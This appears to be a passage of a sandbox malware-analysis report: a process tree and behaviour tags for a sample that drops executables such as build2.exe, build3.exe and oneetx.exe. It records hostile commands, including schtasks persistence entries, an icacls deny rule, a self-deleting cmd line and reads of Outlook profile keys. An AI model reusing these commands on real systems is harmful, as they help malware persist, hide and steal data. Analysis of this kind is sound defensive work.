msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe"C:\Users\Admin\AppData\Local\Temp\5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\EE9B.exeC:\Users\Admin\AppData\Local\Temp\EE9B.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 7043⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\EFF3.exeC:\Users\Admin\AppData\Local\Temp\EFF3.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EFF3.exeC:\Users\Admin\AppData\Local\Temp\EFF3.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ab3c080d-cce8-4707-aacc-e96b611578e9" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\EFF3.exe"C:\Users\Admin\AppData\Local\Temp\EFF3.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EFF3.exe"C:\Users\Admin\AppData\Local\Temp\EFF3.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build2.exe"C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build2.exe"C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build2.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build2.exe" & exit8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build3.exe"C:\Users\Admin\AppData\Local\2fe14d4b-3480-4862-b1d4-544fd06d49e1\build3.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1A8.exeC:\Users\Admin\AppData\Local\Temp\1A8.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7C3.exeC:\Users\Admin\AppData\Local\Temp\7C3.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AE1.exeC:\Users\Admin\AppData\Local\Temp\AE1.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 3403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\F09.exeC:\Users\Admin\AppData\Local\Temp\F09.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\F09.exeC:\Users\Admin\AppData\Local\Temp\F09.exe3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F09.exe"C:\Users\Admin\AppData\Local\Temp\F09.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\F09.exe"C:\Users\Admin\AppData\Local\Temp\F09.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build2.exe"C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build2.exe"C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build2.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build2.exe" & exit8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build3.exe"C:\Users\Admin\AppData\Local\fb3943a3-ad13-42a1-9ff3-5c605d29df86\build3.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1E7B.exeC:\Users\Admin\AppData\Local\Temp\1E7B.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 8163⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\260D.exeC:\Users\Admin\AppData\Local\Temp\260D.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2821.exeC:\Users\Admin\AppData\Local\Temp\2821.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 3403⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.0.397450920\454808520" -parentBuildID 20221007134813 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a019cec-8cc6-4dfe-a54b-28a9d1019c6e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1932 2df98419858 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.1.653105460\1101980681" -parentBuildID 20221007134813 -prefsHandle 2320 -prefMapHandle 2316 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee46e096-a3b1-4713-983c-ebcdd1a3973e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 2332 2df8a470a58 socket4⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.2.544653169\1717681457" -childID 1 -isForBrowser -prefsHandle 3208 -prefMapHandle 3128 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d4ccd4b-c5eb-4f50-99d5-b12ca0a4d3cd} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3204 2df9b130e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.3.1097726766\117767442" -childID 2 -isForBrowser -prefsHandle 2480 -prefMapHandle 1464 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18848b0-cfe8-4d6e-b7a6-e718b057976d} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1188 2df8a46bb58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.4.1888150072\1088427738" -childID 3 -isForBrowser -prefsHandle 4192 -prefMapHandle 4188 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {841aa082-8b6b-4c9d-aec2-3b419e25d5c4} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4204 2df8a45b558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.7.200512468\1687616662" -childID 6 -isForBrowser -prefsHandle 5264 -prefMapHandle 5268 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe619fba-6f56-4929-be20-a62fe43a8b6f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5256 2df9dab3358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.6.267359429\2087275850" -childID 5 -isForBrowser -prefsHandle 5068 -prefMapHandle 5072 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ade60e0-fdb1-4bcf-9c1c-7c81502ff248} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4952 2df9dab2a58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.5.1102110477\1282898963" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb3f3e3e-b7ba-47a8-a39f-659b5ee0e624} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4924 2df9dab4b58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.8.1641767826\1117895316" -childID 7 -isForBrowser -prefsHandle 5984 -prefMapHandle 5988 -prefsLen 26834 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a6a054b-f614-4169-8c61-e55125f4acfb} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6000 2df9fc2f258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.9.1143820722\8266188" -parentBuildID 20221007134813 -prefsHandle 3032 -prefMapHandle 3744 -prefsLen 26851 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5c09763-19a9-458e-b7df-57437dfbf0c5} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3808 2df9fefa158 rdd4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.10.546983041\143326872" -childID 8 -isForBrowser -prefsHandle 5096 -prefMapHandle 5112 -prefsLen 26851 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6dea6faa-0584-4599-94ab-b2acb7dab842} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4932 2df9fc3ba58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.12.1676387608\586048893" -childID 10 -isForBrowser -prefsHandle 6156 -prefMapHandle 5112 -prefsLen 26851 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f06322c-533f-43b8-ae09-e2dccff46b51} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5220 2df9fb17358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.11.1866634562\478126356" -childID 9 -isForBrowser -prefsHandle 5056 -prefMapHandle 3360 -prefsLen 26851 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84e22f21-a78c-485d-910d-5eb3f713253e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3560 2df9fa55358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.13.1297212952\307051273" -childID 11 -isForBrowser -prefsHandle 6504 -prefMapHandle 4952 -prefsLen 26891 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {720d4266-e19c-4e63-bf7b-5564374d1bcc} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6328 2df9e1eba58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.14.531570293\308734442" -childID 12 -isForBrowser -prefsHandle 6012 -prefMapHandle 6024 -prefsLen 27235 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e3e6fda-ca77-44fe-8685-b86da75c3a1c} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6096 2df99e18258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.15.1944810131\472008518" -childID 13 -isForBrowser -prefsHandle 2760 -prefMapHandle 10652 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41dbb21d-9254-48ae-aceb-d58febb1a805} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3520 2df9fb18558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.16.592371596\1098224827" -childID 14 -isForBrowser -prefsHandle 8108 -prefMapHandle 8104 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ca543d0-6df2-40b8-96a6-ce0ffb6ad143} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8116 2df9fa0fb58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.17.498313842\505098137" -childID 15 -isForBrowser -prefsHandle 5152 -prefMapHandle 3044 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b12522cd-5dc7-46da-9283-4f8b6d68bb34} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8068 2df9fc3cc58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.18.691089195\1794433735" -childID 16 -isForBrowser -prefsHandle 6552 -prefMapHandle 6544 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7134351a-0dc4-4c1a-b3ae-75e029f5472f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6512 2df9f3bce58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.19.16361774\752111364" -childID 17 -isForBrowser -prefsHandle 6152 -prefMapHandle 6224 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70202cdd-607d-4933-9673-ab7525125f42} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5460 2df9730fe58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.21.1638960733\126419175" -childID 19 -isForBrowser -prefsHandle 6228 -prefMapHandle 6040 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {672dfa12-9ad6-4662-9b1a-e33a1b2dc808} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3372 2df9fc3bd58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.20.809601410\1492925005" -childID 18 -isForBrowser -prefsHandle 6132 -prefMapHandle 5460 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0da67c93-8dcc-4902-901a-5b6742235909} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5400 2df9fc3c958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.22.307755821\1427621637" -childID 20 -isForBrowser -prefsHandle 3732 -prefMapHandle 3736 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4dd1ee1a-3c74-4bf4-986b-2c959d90d093} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3508 2df9fc3de58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.23.715314753\756247886" -childID 21 -isForBrowser -prefsHandle 5992 -prefMapHandle 8220 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a37d619-edef-4597-9266-4c404b6a2f92} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1512 2df8a42ed58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.24.127264525\1171240490" -childID 22 -isForBrowser -prefsHandle 10420 -prefMapHandle 5036 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72a473e4-0c6f-43ed-bb15-8b79a948bd41} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3480 2df9dabb958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.26.1434923112\1820107029" -childID 24 -isForBrowser -prefsHandle 8076 -prefMapHandle 8308 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d1cb608-7cc3-437c-8daf-120369fbdb46} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6040 2df9e114b58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.25.517262037\1345189105" -childID 23 -isForBrowser -prefsHandle 10304 -prefMapHandle 10596 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c181f7f-a66c-4b95-b661-26494c1badef} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10588 2df9e111258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.27.494895443\695737000" -childID 25 -isForBrowser -prefsHandle 8080 -prefMapHandle 6160 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fadf43e-dada-4d5f-97d7-58da3fa5645c} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8036 2df8a46f558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.30.1580484671\1530162019" -childID 28 -isForBrowser -prefsHandle 8248 -prefMapHandle 8252 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e83dfa69-4907-4f37-acee-7214d3edc8f8} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8240 2df9cea8658 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.29.209529581\1036950090" -childID 27 -isForBrowser -prefsHandle 4916 -prefMapHandle 4596 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4078bb5b-78c4-4857-9a1d-e08d3d2aab4f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10492 2df9cea6258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.28.1880241782\906645828" -childID 26 -isForBrowser -prefsHandle 4920 -prefMapHandle 8256 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bb73fe4-246d-4f3d-b439-0e3df4314afc} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4992 2df9c4ba558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.33.1809931863\386834051" -childID 31 -isForBrowser -prefsHandle 10468 -prefMapHandle 10520 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd83a6e4-7f0a-4f38-83f7-53b238cb04ec} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1408 2df8a468458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.32.356622894\471589740" -childID 30 -isForBrowser -prefsHandle 6636 -prefMapHandle 5476 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f78a11b-7106-4aad-a965-2eb84f0c32f7} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10268 2df8a465358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.31.958334305\505281440" -childID 29 -isForBrowser -prefsHandle 6100 -prefMapHandle 4936 -prefsLen 27371 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f0ec58e-c2ed-4a56-b9b0-684bfe5a31eb} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10592 2df8a42e458 tab4⤵
-
